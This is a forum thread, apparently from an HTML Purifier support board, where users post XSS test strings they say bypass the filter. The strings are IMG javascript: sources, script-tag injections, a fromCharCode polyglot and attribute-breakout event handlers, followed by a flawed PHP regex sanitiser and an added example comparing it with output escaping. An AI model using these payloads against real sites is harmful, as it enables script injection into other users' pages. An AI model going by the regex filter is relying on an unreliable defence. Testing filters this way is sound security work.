
This code works on htmlpurifier

Saud
This code works on htmlpurifier
May 19, 2009 12:57AM

i got it from http://ha.ckers.org/xss.html and it works on my form.

Saud
Re: This code works on htmlpurifier
May 19, 2009 12:58AM
<IMG SRC="javascript:alert(&#039;XSS&#039;);">

i got it from http://ha.ckers.org/xss.html and it works on my form.

Saud
Re: This code works on htmlpurifier
May 19, 2009 01:07AM

This xss code works too

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Re: This code works on htmlpurifier
May 19, 2009 01:11AM

Uhhh... no it doesn't.

Re: This code works on htmlpurifier
May 19, 2009 01:12AM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:25PM

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>

Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:27PM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:29PM
Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:33PM

žscriptualert(EXSSE)ž/scriptu

Woogie
Re: This code works on htmlpurifier
February 04, 2010 09:33PM

very nice

aeno
Re: This code works on htmlpurifier
July 15, 2010 02:06PM

<a href="http://aeno.co.cc/abc/" target="_blank">aeno.co.cc/abc/</a>

Philip
Re: This code works on htmlpurifier
August 30, 2011 07:27AM

'onmouseover=prompt(934419) bad='

Brian
Re: This code works on htmlpurifier
September 14, 2011 12:36AM

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

al
Re: This code works on htmlpurifier
November 05, 2011 08:39AM

jjjj

electrocity
Re: This code works on htmlpurifier
November 26, 2011 07:50AM

" onclick='alert(50)' "

But I can't test it here; it's only in an HTML input field, saved to the database and re-rendered.

The code with tags is filtered correctly. I cannot prove it here, but all my tests are working.

I used this to prevent all JavaScript:

    $value = preg_replace('@<[\/\!]*?[^<>]*?>@si', '', $value); // remove all HTML tags
    $value = (string)preg_replace('#on[a-z](.+?)\)#si', '', $value); // remove start of script: onclick() onload()...
    $value = trim(str_replace('"', ' ', $value), "'");
    $value = (string)preg_replace('#^\'#si', '', $value); // remove ' at start

But it's not perfect, because this can remove unwanted chars.
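As an added example (not code from this thread or from HTML Purifier), the four stripping steps above reproduced as a function next to the usual alternative, escaping on output with htmlspecialchars(), run over three payloads quoted earlier in this thread plus one constructed benign sentence; the input list and the crude "can this still break HTML" check are assumptions of the example.

```php
<?php
// Added example, not code from this thread or from HTML Purifier.
// strip_filter() reproduces the four regex/str_replace steps posted above;
// html_escape() keeps the text and encodes it for the HTML context instead.

function strip_filter(string $value): string
{
    $value = preg_replace('@<[\/\!]*?[^<>]*?>@si', '', $value);       // remove all HTML tags
    $value = (string) preg_replace('#on[a-z](.+?)\)#si', '', $value); // remove on...( ... )
    $value = trim(str_replace('"', ' ', $value), "'");
    $value = (string) preg_replace('#^\'#si', '', $value);            // remove ' at start
    return $value;
}

function html_escape(string $value): string
{
    // ENT_QUOTES also encodes ' (as &#039;, which is what this forum did above).
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True if a character that can open a tag or close a quoted attribute
// survives. Assumed, deliberately crude check; not an HTML parser.
function can_break_html_context(string $value): bool
{
    return preg_match('/[<>"\']/', $value) === 1;
}

// Constructed input set: three payloads quoted in this thread and one
// benign sentence containing "on" followed later by a closing parenthesis.
$inputs = [
    'img'    => '<IMG SRC="javascript:alert(\'XSS\');">',
    'attr'   => '" onclick=\'alert(50)\' "',
    'mouse'  => '\'onmouseover=prompt(934419) bad=\'',
    'benign' => 'Contact me once you are done (any time).',
];

foreach ($inputs as $name => $in) {
    $stripped = strip_filter($in);
    $escaped  = html_escape($in);
    printf("%-6s strip  -> %s  [%s]\n", $name, var_export($stripped, true),
        can_break_html_context($stripped) ? 'still risky' : 'inert');
    printf("%-6s escape -> %s  [%s]\n\n", $name, $escaped,
        can_break_html_context($escaped) ? 'still risky' : 'inert');
}
```

Running it shows the "unwanted chars" problem admitted above: the benign sentence is cut down to "C." because "ont" in "Contact" matches the on[a-z] rule, and the attr payload keeps a bare single quote, while html_escape() leaves every input readable and inert.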
